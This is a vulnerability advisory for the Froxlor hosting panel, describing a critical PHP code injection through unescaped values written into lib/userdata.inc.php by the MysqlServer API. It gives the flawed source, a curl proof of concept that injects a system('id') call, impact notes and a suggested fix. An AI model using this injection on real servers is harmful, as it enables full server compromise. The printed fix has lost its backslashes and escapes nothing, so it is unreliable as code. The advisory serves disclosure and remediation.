PT-2026-35184 · Packagist · Froxlor/Froxlor
Published
2026-04-16
·
Updated
2026-04-16
CVSS v3.1
9.1
Critical
| Vector | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
Summary
PhpHelper::parseArrayToString() writes string values into single-quoted PHP string literals without escaping single quotes. When an admin with change serversettings permission adds or updates a MySQL server via the API, the privileged user parameter (which has no input validation) is written unescaped into lib/userdata.inc.php. Since this file is required on every request via Database::getDB(), an attacker can inject arbitrary PHP code that executes as the web server user on every subsequent page load.Details
The root cause is in
PhpHelper::parseArrayToString() at lib/Froxlor/PhpHelper.php:486:php
// lib/Froxlor/PhpHelper.php:475-487
foreach ($array as $key => $value) {
if (!is array($value)) {
if (is bool($value)) {
$str .= self::tabPrefix($depth, sprintf("'%s' => %s,
", $key, $value ? 'true' : 'false'));
} elseif (is int($value)) {
$str .= self::tabPrefix($depth, "'{$key}' => $value,
");
} else {
if ($key == 'password') {
// special case for passwords (nowdoc)
$str .= self::tabPrefix($depth, "'{$key}' => <<<'EOT'
{$value}
EOT,
");
} else {
// VULNERABLE: $value interpolated without escaping single quotes
$str .= self::tabPrefix($depth, "'{$key}' => '{$value}',
");
}
}
}
}Note that the
password key receives special treatment via nowdoc syntax (line 484), which is safe because nowdoc does not interpret any escape sequences or variable interpolation. However, all other string keys — including user, caption, and caFile — are written directly into single-quoted PHP string literals with no escaping.The attack path through
MysqlServer::add() (lib/Froxlor/Api/Commands/MysqlServer.php:80):validateAccess()(line 82) checks the caller is an admin withchange serversettingsprivileged useris read viagetParam()at line 88 with no validation appliedmysql cais also read with no validation at line 86- The values are placed into the
$sql rootarray at lines 150-160 generateNewUserData()is called at line 162, which callsPhpHelper::parseArrayToPhpFile()→parseArrayToString()- The result is written to
lib/userdata.inc.phpviafile put contents()(line 548) - Setting
test connection=0(line 92, 110) skips the PDO connection test, so no valid MySQL credentials are needed
The generated
userdata.inc.php is loaded on every request via Database::getDB() at lib/Froxlor/Database/Database.php:431:php
require Froxlor::getInstallDir() . "/lib/userdata.inc.php";The
MysqlServer::update() method (line 337) has the identical vulnerability with privileged user at line 387.PoC
Step 1: Inject PHP code via MysqlServer.add API
bash
curl -s -X POST https://froxlor.example/api.php
-u 'ADMIN APIKEY:ADMIN APISECRET'
-H 'Content-Type: application/json'
-d '{
"command": "MysqlServer.add",
"params": {
"mysql host": "127.0.0.1",
"mysql port": 3306,
"privileged user": "x'''.system("id").'''",
"privileged password": "anything",
"description": "test",
"test connection": 0
}
}'This writes the following into
lib/userdata.inc.php:php
'user' => 'x'.system("id").'',Step 2: Trigger code execution
Any subsequent HTTP request to the Froxlor panel triggers
Database::getDB(), which requires userdata.inc.php, executing system("id") as the web server user:bash
curl -s https://froxlor.example/The
id output will appear in the response (or can be captured via out-of-band methods for blind execution).Step 3: Cleanup (attacker would also clean up)
The injected code runs on every request until
userdata.inc.php is regenerated or manually fixed.Impact
An admin with
change serversettings permission can escalate to arbitrary OS command execution as the web server user. This represents a scope change from the Froxlor application boundary to the underlying operating system:- Full server compromise: Execute arbitrary commands as the web server user (typically
www-data) - Data exfiltration: Read all hosted customer data, databases credentials, TLS private keys
- Lateral movement: Access all MySQL databases using credentials stored in
userdata.inc.php - Persistent backdoor: The injected code executes on every request, providing persistent access
- Denial of service: Malformed PHP in
userdata.inc.phpcan break the entire panel
The
description field (validated with REGEX DESC TEXT = /^[^0r <>]*$/) and mysql ca field (no validation) are also injectable vectors through the same code path.Recommended Fix
Escape single quotes in
PhpHelper::parseArrayToString() before interpolating values into single-quoted PHP string literals. In single-quoted PHP strings, only ' and `` are interpreted, so both must be escaped:php
// lib/Froxlor/PhpHelper.php:486
// Before (vulnerable):
$str .= self::tabPrefix($depth, "'{$key}' => '{$value}',
");
// After (fixed) - escape backslashes first, then single quotes:
$escaped = str replace(['', "'"], ['', "'"], $value);
$str .= self::tabPrefix($depth, "'{$key}' => '{$escaped}',
");Alternatively, use the same nowdoc syntax already used for passwords for all string values, which provides complete injection safety:
php
// Apply nowdoc to all string values, not just passwords:
$str .= self::tabPrefix($depth, "'{$key}' => <<<'EOT'
{$value}
EOT,
");Additionally, consider adding input validation to
privileged user and mysql ca in MysqlServer::add() and MysqlServer::update() as defense-in-depth.Fix
Code Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Froxlor/Froxlor